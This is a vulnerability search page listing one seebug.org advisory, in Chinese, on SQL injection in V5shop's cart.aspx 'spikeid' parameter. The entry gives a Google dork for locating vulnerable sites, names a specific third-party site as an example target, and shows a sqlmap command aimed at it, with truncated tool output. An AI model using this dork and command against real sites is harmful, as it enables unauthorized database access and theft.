CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

1 matches found

seebug.org•added 2016/01/13 12:0 a.m.•30 views

V5shop 在cart.aspx处的参数spikeid存在SQL注入漏洞

举例：通过谷歌搜索inurl:productpic.aspx,因为cart.aspx是需要登录才可以正常访问，但是注入的时候毫无影响。案例： http://www.wolifu.com/cart.aspx?act=spikebuy&spikeid=3 D:\sqlmappython sqlmap.py -u "http://www.wolifu.com/cart.aspx?act=spikebuy&spik eid=3" -p "spikeid" | | 1.0-dev-nongit-20150806 | -| . | | | .'| . | || |||||,| | || ||...

7.7AI score

Exploits0

Rows per page

Query Builder

Family

Bulletin Type

Min CVSS Score

Date

Order by